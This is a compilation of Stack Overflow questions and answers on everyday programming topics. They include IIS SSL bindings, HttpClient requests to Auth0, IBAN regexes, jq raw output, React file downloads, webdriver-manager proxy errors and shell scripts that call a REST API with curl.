"url": "https://stackoverflow.com/questions/44656013"
} |
d3877864c07fdf4f8db76a01ba6a1355741286c9 | Stackoverflow Stackexchange
Q: Unable to start debugging on the web server. The underlying connection was closed: An unexpected error occurred on a send We are developing a SOAP-based WCF Service in Visual Studio:
The virtual directory did get created. However, when I try to run the code in Visual Studio 2015 (F5) Debug mode, it gives me the following error:
Unable to start debugging on the web server. The underlying
connection was closed: An unexpected error occurred on a send
The aforementioned error started showing up when our company changed their Windows Domain name. How can I resolve the problem?
Here are the technologies used in our development environment:
*
*Windows Server 2012 R2 Standard 64-bit Operating System, x64-based processor
*Microsoft Visual Studio Enterprise 2015 Version 14.0.25431.01 Update 3
*Internet Information Services ( Version 8.5.9600.16384 )
A: 1- Select your site in IIS.
2- Go to top-right and click on bindings.
3- Select your application and click edit.
4- Select an SSL certificate; if one doesn't exist, you may need to create it.
A: I needed to make a Fake Self-Signed Certificate, and associate it with the https 443 port of the Web site as the picture below shows:
A: For me it worked after a Windows update.
*
*Go to Settings, then Update & Security.
*Click on "Check online for updates from Microsoft Update" -> it will start downloading and installing the updates automatically.
*Once the download and installation are complete, restart the system when prompted and then try again.
| stackoverflow | {
"language": "en",
"length": 253,
"provenance": "stackexchange_0000F.jsonl.gz:901305",
"question_score": "7",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656027"
} |
ae504b41fb25f411b51bc0d0c06a467fc93ab904 | Stackoverflow Stackexchange
Q: Converting code from RestSharp to HttpClient Could someone please help me convert this ASP.NET Core example (to be used in my Web API to consume a management API from Auth0), which uses RestSharp, into one using HttpClient?
var client = new RestClient("https://YOUR_AUTH0_DOMAIN/oauth/token");
var request = new RestRequest(Method.POST);
request.AddHeader("content-type", "application/json");
request.AddParameter("application/json", "{\"grant_type\":\"client_credentials\",\"client_id\": \"YOUR_CLIENT_ID\",\"client_secret\": \"YOUR_CLIENT_SECRET\",\"audience\": \"https://YOUR_AUTH0_DOMAIN/api/v2/\"}", ParameterType.RequestBody);
IRestResponse response = client.Execute(request);
I've been struggling... I've got this:
var client = new HttpClient();
client.DefaultRequestHeaders.Accept.Clear();
client.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
client.BaseAddress = new Uri("https://YOUR_AUTH0_DOMAIN/oauth/token");
but I'm not sure about the rest... thank you
A: You need to take the request body and create content to post
var client = new HttpClient();
client.DefaultRequestHeaders.Accept.Clear();
client.DefaultRequestHeaders.Accept.Add(new MediaTypeWithQualityHeaderValue("application/json"));
client.BaseAddress = new Uri("https://YOUR_AUTH0_DOMAIN/oauth/token");
var json = "{\"grant_type\":\"client_credentials\",\"client_id\": \"YOUR_CLIENT_ID\",\"client_secret\": \"YOUR_CLIENT_SECRET\",\"audience\": \"https://YOUR_AUTH0_DOMAIN/api/v2/\"}";
var content = new StringContent(json, Encoding.UTF8, "application/json");
var response = await client.PostAsync("", content);
| stackoverflow | {
"language": "en",
"length": 133,
"provenance": "stackexchange_0000F.jsonl.gz:901339",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656130"
} |
923af94cbd75ee801f9215ed4d8a49734e20aa61 | Stackoverflow Stackexchange
Q: Marklogic: Xpath using removing processing instruction tag How do I remove processing instruction tags in XML using XQuery?
Sample XML:
<a>
<text><?test id="1" loc="start"?><b type="bold">1. </b>
Security or protection <?test id="1" loc=="end"?><?test id="1" loc="start"?><b type="bold">2.
</b> Analyse.
<?test id="1" loc="end"?></text>
</a>
Expected output :
<a>
<text><b type="bold">1. </b> Security or protection <b type="bold">2.
</b> Analyse.</text>
</a>
Kindly help with removing the PI tags.
A: Something like this should work:
xquery version "1.0-ml";
declare function local:suppress-pi($nodes) {
for $node in $nodes
return
typeswitch ($node)
case element() return
element { fn:node-name($node) } {
$node/@*,
local:suppress-pi($node/node())
}
case processing-instruction() return ()
default return $node
};
local:suppress-pi(<a>
<text><?test id="1" loc="start"?><b type="bold">1. </b>
Security or protection <?test id="1" loc=="end"?><?test id="1" loc="start"?><b type="bold">2.
</b> Analyse.
<?test id="1" loc="end"?></text>
</a>)
HTH!
| stackoverflow | {
"language": "en",
"length": 125,
"provenance": "stackexchange_0000F.jsonl.gz:901341",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656139"
} |
18e4556866b6014d03eebcd0fd4ebd79d4ab60ab | Stackoverflow Stackexchange
Q: How to do annotations with Altair? I am trying to write some text inside the figure to highlight something in my plot (equivalent to 'annotate' in matplotlib). Any idea? Thanks
A: You can get annotations into your Altair plots in two steps:
*
*Use mark_text() to specify the annotation's position, fontsize etc.
*Use transform_filter() with datum to select the points (the data subset) that need the annotation. Note the line from altair import datum.
Code:
import altair as alt
from vega_datasets import data
alt.renderers.enable('notebook')
from altair import datum #Needed for subsetting (transforming data)
iris = data.iris()
points = alt.Chart(iris).mark_point().encode(
x='petalLength',
y='petalWidth',
color='species')
annotation = alt.Chart(iris).mark_text(
align='left',
baseline='middle',
fontSize = 20,
dx = 7
).encode(
x='petalLength',
y='petalWidth',
text='petalLength'
).transform_filter(
(datum.petalLength >= 5.1) & (datum.petalWidth < 1.6)
)
points + annotation
which produces:
These are static annotations. You can also get interactive annotations by binding selections to the plots.
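A hedged sketch of the interactive variant, assuming Altair 4's selection API (alt.selection_single and add_selection were renamed selection_point and add_params in Altair 5), which labels only the hovered point:
hover = alt.selection_single(on='mouseover', empty='none',
                             fields=['petalLength', 'petalWidth'])

points = alt.Chart(iris).mark_point().encode(
    x='petalLength',
    y='petalWidth',
    color='species'
).add_selection(hover)

labels = alt.Chart(iris).mark_text(align='left', dx=7).encode(
    x='petalLength',
    y='petalWidth',
    text='species'
).transform_filter(hover)

points + labels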
| stackoverflow | {
"language": "en",
"length": 147,
"provenance": "stackexchange_0000F.jsonl.gz:901342",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656141"
} |
914b6e9abbc016ac0243b605dce8f23ecf7c4d8f | Stackoverflow Stackexchange
Q: IBAN Regex design Help me please to design Regex that will match all IBANs with all possible whitespaces. Because I've found that one, but it does not work with whitespaces.
[a-zA-Z]{2}[0-9]{2}[a-zA-Z0-9]{4}[0-9]{7}([a-zA-Z0-9]?){0,16}
I need at least that formats:
DE89 3704 0044 0532 0130 00
AT61 1904 3002 3457 3201
FR14 2004 1010 0505 0001 3
A: Here is a suggestion that may works for the patterns you provided:
[A-Z]{2}\d{2} ?\d{4} ?\d{4} ?\d{4} ?\d{4} ?[\d]{0,2}
Try it on regex101
Explanation
*
*[A-Z]{2}\d{2} ? 2 capital letters followed by 2 digits (optional space)
*\d{4} ? 4 digits, repeated 4 times (optional space)
*[\d]{0,2} 0 to 2 digits
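To sanity-check the suggested pattern outside regex101, here is a minimal Python sketch (fullmatch is an assumption that the whole string should be an IBAN; the pattern itself is copied verbatim from above):
import re

IBAN_RE = re.compile(r"[A-Z]{2}\d{2} ?\d{4} ?\d{4} ?\d{4} ?\d{4} ?[\d]{0,2}")

samples = [
    "DE89 3704 0044 0532 0130 00",
    "AT61 1904 3002 3457 3201",
    "FR14 2004 1010 0505 0001 3",
]
for s in samples:
    # fullmatch anchors the pattern to the entire string
    print(s, "->", bool(IBAN_RE.fullmatch(s)))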
A: Just to find the example IBANs from those countries in a text:
Start with 2 letters then 2 digits.
Then allow a space before every 4 digits, optionally ending with 1 or 2 digits:
\b[A-Z]{2}[0-9]{2}(?:[ ]?[0-9]{4}){4}(?!(?:[ ]?[0-9]){3})(?:[ ]?[0-9]{1,2})?\b
regex101 test here
Note that if the intention is to validate a complete string, that the regex can be simplified.
Since the negative look-ahead (?!...) won't be needed then.
And the word boundaries \b can be replaced by the start ^ and end $ of the line.
^[A-Z]{2}[0-9]{2}(?:[ ]?[0-9]{4}){4}(?:[ ]?[0-9]{1,2})?$
Also, it can be simplified even more if having the 4 groups of 4 connected digits doesn't really matter.
^[A-Z]{2}(?:[ ]?[0-9]){18,20}$
Extra
If you need to match an IBAN number from accross the world?
Then the BBAN part of the IBAN is allowed to have up to 30 numbers or uppercase letters. Reference
And can be written with either spaces or dashes or nothing in between.
For example: CC12-XXXX-12XX-1234-5678-9012-3456-7890-123
So the regex pattern to match a complete string with a long IBAN becomes a bit longer.
^([A-Z]{2}[ \-]?[0-9]{2})(?=(?:[ \-]?[A-Z0-9]){9,30}$)((?:[ \-]?[A-Z0-9]{3,5}){2,7})([ \-]?[A-Z0-9]{1,3})?$
regex101 test here
Also note that a pure regex solution can't do calculations, so extra code is required to actually validate an IBAN number.
Example Javascript Snippet:
function smellsLikeIban(str){
return /^([A-Z]{2}[ \-]?[0-9]{2})(?=(?:[ \-]?[A-Z0-9]){9,30}$)((?:[ \-]?[A-Z0-9]{3,5}){2,7})([ \-]?[A-Z0-9]{1,3})?$/.test(str);
}
function validateIbanChecksum(iban) {
const ibanStripped = iban.replace(/[^A-Z0-9]+/gi,'') //keep numbers and letters only
.toUpperCase(); //calculation expects upper-case
const m = ibanStripped.match(/^([A-Z]{2})([0-9]{2})([A-Z0-9]{9,30})$/);
if(!m) return false;
const numbericed = (m[3] + m[1] + m[2]).replace(/[A-Z]/g,function(ch){
//replace upper-case characters by numbers 10 to 35
return (ch.charCodeAt(0)-55);
});
  //The resulting number would be too long for JavaScript to handle without losing precision.
  //So the trick is to chop the string up into smaller parts.
const mod97 = numbericed.match(/\d{1,7}/g)
.reduce(function(total, curr){ return Number(total + curr)%97},'');
return (mod97 === 1);
};
var arr = [
'DE89 3704 0044 0532 0130 00', // ok
'AT61 1904 3002 3457 3201', // ok
'FR14 2004 1010 0505 0001 3', // wrong checksum
'GB82-WEST-1234-5698-7654-32', // ok
'NL20INGB0001234567', // ok
'XX00 1234 5678 9012 3456 7890 1234 5678 90', // only smells ok
'YY00123456789012345678901234567890', // only smells ok
'NL20-ING-B0-00-12-34-567', // stinks, but still a valid checksum
'XX22YYY1234567890123', // wrong checksum again
'[email protected]' // This Is Not The IBAN You Are Looking For
];
arr.forEach(function (str) {
console.log('['+ str +'] Smells Like IBAN: '+ smellsLikeIban(str));
console.log('['+ str +'] Valid IBAN Checksum: '+ validateIbanChecksum(str))
});
A: You can use a regex like this:
^[A-Z]{2}\d{2} (?:\d{4} ){3}\d{4}(?: \d\d?)?$
Working demo
This will match only those string formats
A: It's probably best to look up the specifications for a correct IBAN number. But if you want to have a regex similar to your existing one, but with spaces, you can use the following one:
^[a-zA-Z]{2}[0-9]{2}\s?[a-zA-Z0-9]{4}\s?[0-9]{4}\s?[0-9]{3}([a-zA-Z0-9]\s?[a-zA-Z0-9]{0,4}\s?[a-zA-Z0-9]{0,4}\s?[a-zA-Z0-9]{0,4}\s?[a-zA-Z0-9]{0,3})?$
Here is a live example: https://regex101.com/r/ZyIPLD/1
| stackoverflow | {
"language": "en",
"length": 567,
"provenance": "stackexchange_0000F.jsonl.gz:901377",
"question_score": "22",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656264"
} |
de298bd05cd2e473a59e73279969ee2ffb0b54c1 | Stackoverflow Stackexchange
Q: how to change bootstrap input text box style to line? I am working in Laravel with Bootstrap CSS. Now I need to change the input text box style to a line...
this is My bootstrap input text box
<div class="form-group{{ $errors->has('name') ? ' has-error' : '' }}">
<label for="name" class="control-label">Name</label>
<input type="text" name="name" class="form-control" id="name" value="{{ old('name') ?: '' }}">
@if ($errors->has('name'))
<span class="help-block">{{ $errors->first('name') }}</span>
@endif
</div>
I wrote css file as follow
#input {
background: transparent;
border: none;
border-bottom: 1px solid #000000;
}
The line appears, but the Bootstrap input box style is still there. How can I remove the Bootstrap style and make my input box render as a line?
A: input is targeting an id named input(which I don't see in your code).
You need to target input itself by removing the #, or... change #input to #name since that is the actual id.
A: Try this:
html {
/* for demo purposes only */
margin: 2em;
}
input[type="text"],
select.form-control {
background: transparent;
border: none;
border-bottom: 1px solid #000000;
-webkit-box-shadow: none;
box-shadow: none;
border-radius: 0;
}
input[type="text"]:focus,
select.form-control:focus {
-webkit-box-shadow: none;
box-shadow: none;
}
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<div class="form-group">
<label for="name" class="control-label">Name</label>
<input type="text" name="name" class="form-control" id="name" value="test">
</div>
<div class="form-group">
<label for="dropdown-test" class="control-label">Dropdown test</label>
<select class="form-control" name="dropdown-test">
<option>1</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
</select>
</div>
The :focus rule is so that only the underline changes colour when the input control is focused; otherwise you'll still see the default blue 'glow'.
A: Change #input in the CSS to #name. In your HTML the id for the input is given as name.
#name {
background: transparent;
border: none;
border-bottom: 1px solid #000000;
outline:none;
box-shadow:none;
}
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"/>
<div class="form-group ">
<label for="name" class="control-label">Name</label>
<input type="text" name="name" class="form-control" id="name" value="">
</div>
| stackoverflow | {
"language": "en",
"length": 285,
"provenance": "stackexchange_0000F.jsonl.gz:901380",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656269"
} |
4864887a6ed55e8d1cf0b02b4a11ceeeeeeae361 | Stackoverflow Stackexchange
Q: PHP: set_error_handler and visibility In my class constructor, I have the following:
set_error_handler(array(
$this,
'_custom_error_handler'
));
In the same class, I have the following method defined:
protected function _custom_error_handler($error_number, $error_string, $error_file, $error_line)
When something in my code runs into an error, I get the following warning:
Warning: Invalid callback ... _custom_error_handler, cannot access protected method
Why can't this class (or its children?) access this protected method? Shouldn't a protected method be accessible???
A: A protected method is only accessible from inside the class, or subclasses.
In this case set_error_handler is calling a method, and set_error_handler is outside your class. Therefore it must be public.
| stackoverflow | {
"language": "en",
"length": 105,
"provenance": "stackexchange_0000F.jsonl.gz:901400",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656352"
} |
df1309978bee008c08c8d9c488425e90a853b381 | Stackoverflow Stackexchange
Q: How to remove double-quotes in jq output for parsing json files in bash? I'm using jq to parse a JSON file as shown here. However, the results for string values contain the "double-quotes" as expected, as shown below:
$ cat json.txt | jq '.name'
"Google"
How can I pipe this into another command to remove the ""? so I get
$ cat json.txt | jq '.name' | some_other_command
Google
What some_other_command can I use?
A: So for a file containing just {"name": "Google"} then yes
sample='{"name":"Google"}'
echo $sample| jq '.name'
"Google"
using --raw-output helps
echo $sample| jq --raw-output '.name'
Google
But I stumbled upon this question because I was using --raw-output on a json array like this
sample='[{"name":"Yahoo"},{"name":"Google"}]'
echo $sample | jq --raw-output 'map(.name)'
[
"Yahoo",
"Google"
]
And I didn't understand why the quotes remained. I came across this post, and now I know adding | .[] does the trick!
echo $sample | jq --raw-output 'map(.name)| .[]'
Yahoo
Google
A: Use the -r (or --raw-output) option to emit raw strings as output:
jq -r '.name' <json.txt
| stackoverflow | {
"language": "en",
"length": 178,
"provenance": "stackexchange_0000F.jsonl.gz:901448",
"question_score": "574",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656515"
} |
1fe30b5e8d8521da346cd7a647e45f2941cb0869 | Stackoverflow Stackexchange
Q: Download a string as .txt file in React I have a string which needs to be downloaded in a txt file when click on a button. How can this be implemented using React?
A: Here's a working example. Enter the text in the input field and click Download txt; this will download a .txt file with the contents you entered in the input.
This solution creates a new Blob object of the text MIME type and attaches it to the href of a temporary anchor (<a>) element which is then triggered programmatically.
A Blob object represents a file-like object of immutable, raw data. Blobs represent data that isn't necessarily in a JavaScript-native format.
class MyApp extends React.Component {
downloadTxtFile = () => {
const element = document.createElement("a");
const file = new Blob([document.getElementById('myInput').value], {type: 'text/plain'});
element.href = URL.createObjectURL(file);
element.download = "myFile.txt";
document.body.appendChild(element); // Required for this to work in FireFox
element.click();
}
render() {
return (
<div>
<input id="myInput" />
<button onClick={this.downloadTxtFile}>Download txt</button>
</div>
);
}
}
ReactDOM.render(<MyApp />, document.getElementById("myApp"));
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/react/15.1.0/react-dom.min.js"></script>
<div id="myApp"></div>
This answer was derived from thanhpk's post.
| stackoverflow | {
"language": "en",
"length": 182,
"provenance": "stackexchange_0000F.jsonl.gz:901476",
"question_score": "35",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656610"
} |
24b1849e9e3075fe6610fc6015e22c4bdc619174 | Stackoverflow Stackexchange
Q: Align Button to Bottom in ScrollView I'm trying to align a button to the bottom of the ScrollView and make the ScrollView fill the page. The first screenshot is how it looks, and the second one is what I want.
In the screenshots, ScrollView is not used since there aren't enough items, but the number of items inside the ScrollView is not fixed.
Render():
<ScrollView style={styles.scrollViewContainer}>
<View style={{flex: 1, justifyContent: 'space-between', flexDirection: 'column'}}>
<View style={{flex: 1}}>
<Text style={styles.bigTitle}>Title</Text>
<View style={styles.formContainer}>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
</View>
</View>
<SignupButton onPress={this.submit} title="Next Step" image={require("../Images/right_btn.png")} boldText={true} />
</View>
</ScrollView>
Style:
scrollViewContainer: {
backgroundColor: '#fff',
},
formContainer: {
paddingTop: 10,
paddingLeft: 50,
paddingRight: 50,
paddingBottom: 30,
},
bigTitle: {
fontSize: 24,
textAlign: 'center',
marginTop: 20,
marginBottom: 20,
},
A: You can check my answer on similar question. Here is the link.
How to make component stick to bottom in ScrollView but still allow other content to push it down
A: Try adding justifyContent:'space-between' and flex:1 to the contentContainerStyle of the ScrollView
<ScrollView style={style.container} contentContainerStyle={[{flex:1,justifyContent:'space-between'}]} >
<LIST />
<Button />
</ScrollView>
A: Here you go: just take it out of the ScrollView and make sure that it's at the bottom. If your parent is a RelativeLayout, add android:layout_alignParentBottom="true"
to your SignupButton; if it's a LinearLayout, make sure this is the last View in the XML and that the LinearLayout's height fills the screen; if it's a FrameLayout, then I believe you need to set gravity to bottom :)
<SomeLayout>
<ScrollView style={styles.scrollViewContainer}>
<View style={{flex: 1, justifyContent: 'space-between', flexDirection: 'column'}}>
<View style={{flex: 1}}>
<Text style={styles.bigTitle}>Title</Text>
<View style={styles.formContainer}>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
<Text>Hello</Text>
</View>
</View>
</View>
</ScrollView>
<SignupButton onPress={this.submit} title="Next Step" image={require("../Images/right_btn.png")} boldText={true} />
</SomeLayout>
SomeLayout is a RelativeLayout or LinearLayout or any other Layout you're using...
| stackoverflow | {
"language": "en",
"length": 297,
"provenance": "stackexchange_0000F.jsonl.gz:901514",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656712"
} |
3e3430bff8bba3279cd3a2fa1b2c21c769f48f62 | Stackoverflow Stackexchange
Q: webdriver manager update throws unhandled error I am using Protractor and webdriver; when trying to run an update on webdriver-manager I get the error below.
> webdriver-manager update events.js:160
> throw er; // Unhandled 'error' event
> ^
>
> Error: tunneling socket could not be established, statusCode=407
> at ClientRequest.onConnect (\\hermes\vhd_profiles\VDI_Home_VHD1\modisej\AppData\Roaming\npm\node_modules\protractor\node_modules\tunnel-agent\index.js:166:19)
> at ClientRequest.g (events.js:292:16)
> at emitThree (events.js:116:13)
> at ClientRequest.emit (events.js:194:7)
> at Socket.socketOnData (_http_client.js:394:11)
> at emitOne (events.js:96:13)
> at Socket.emit (events.js:188:7)
> at readableAddChunk (_stream_readable.js:176:18)
> at Socket.Readable.push (_stream_readable.js:134:10)
> at TCP.onread (net.js:551:20)
When I check the list of currently available drivers using webdriver-manager status, I get the below.
$ webdriver-manager status
I/status - selenium standalone is not present
I/status - chromedriver is not present
I/status - geckodriver is not present
I/status - IEDriverServer is not present
I/status - android-sdk is not present
I/status - appium is not present
But see the following when finding webdriver-manager version:
webdriver-manager version
I/version - webdriver-manager 12.0.6
Node Version: 7.2.1
Protractor version: 5.1.2
Webdriver version: 12.0.6
A: webdriver-manager update --proxy=http://proxy:88
This solved my issue.
A: managed to solve this by running the command
webdriver-manager update --proxy="proxy address":8080/
A: Try this,
webdriver-manager update --proxy="http://username:pass@yourproxyserver:port/" --ignore_ssl
worked for me with this command.
Update
With Chrome version
webdriver-manager update --versions.chrome 77.0.3865.90 --proxy="http://username:pass@yourproxyserver:port/" --ignore_ssl
A: Running the command
webdriver-manager update --proxy=http://proxy:88
[16:55:30] I/config_source - curl -o/usr/local/lib/node_modules/protractor/node_modules/webdriver-manager/selenium/gecko-response.json 'http://proxy:88/repos/mozilla/geckodriver/releases' -H 'host:api.github.com'
events.js:174
throw er; // Unhandled 'error' event
^
Error: connect ETIMEDOUT 198.105.254.104:88
| stackoverflow | {
"language": "en",
"length": 240,
"provenance": "stackexchange_0000F.jsonl.gz:901526",
"question_score": "6",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656759"
} |
9113b32751acee10582a4a44661fe2e2f9564523 | Stackoverflow Stackexchange
Q: $null/empty interactive vs script difference Why do the following 3 lines run without error from the PowerShell prompt, but return an error when run in a script (foo.ps1)? In both cases, $b -eq $null returns $true and $b.GetType() returns an error for invoking on $null, but there is something different about the $b in the interactive session.
$a = 1,2,3
[array]$b = $a | where {$false}
$b | where {$_.GetType()}
When run as script, the last line returns
You cannot call a method on a null valued expression.
I ran into this during ill-fated attempts to prevent array unrolling. Removing [array] makes the error go away, and I'll move on to trying to better understand the unrolling rules (I want $b to be an empty array, not $null), but I'd like to understand the reason for the difference here.
A: There is a perfect explanation
*By typing [array] you make the variable strongly typed. I suspect this line in the .NET code triggers the exception, as it needs a type for the variable:
http://referencesource.microsoft.com/#mscorlib/system/array.cs,72
A: If you're running this from the ISE or from an interactive session, the variables persist between runs. In your examples, I'm not sure why you're using Where-Object instead of %/ForEach-Object. Working on what I think you're attempting to do:
$a = @(1, 2, 3)
[Array]$b = @()
$a | % { $b += $_ }
$b | % { $_.GetType() }
| stackoverflow | {
"language": "en",
"length": 234,
"provenance": "stackexchange_0000F.jsonl.gz:901562",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656872"
} |
6742efc342f32595d8e1ee0bfc6f8878f9cd64b6 | Stackoverflow Stackexchange
Q: How to call restapi in .sh file I am trying to create a script to call a REST API endpoint, but I am getting a "bad substitution" error.
Here is my script:
vi script.sh
echo "welcome to the script"
echo ${"http://web-integ000/sampleProject/getProductList"}
But when I execute the curl command at the command line, it works. I used the following command:
$ curl -H "Accept:application/json" http://web-integ000/sampleProject/getProductList
and I got the following output:
[ {
"productId" : "u1604028-5948abd0-0",
"prodcutName":"H1ACX",
"calendarDate" : "2017-06-20"
}
]timeStamp:1497968810
How to get the response from the restapi using script?
A: ${...} is variable expansion, and a URL is not a variable, hence the "bad substitution" error. To capture the output of a command, use command substitution with curl, e.g.:
VAR1=$(curl ....)
You can then use the variable, e.g. echo it.
A: You can use a simple curl command to get the response from the server as follows:-
rest.sh
result=$(curl -X GET --header "Accept: */*" "http://localhost:9090/employees")
echo "Response from server"
echo $result
exit
Hope it works! Thanks!
| stackoverflow | {
"language": "en",
"length": 161,
"provenance": "stackexchange_0000F.jsonl.gz:901568",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44656893"
} |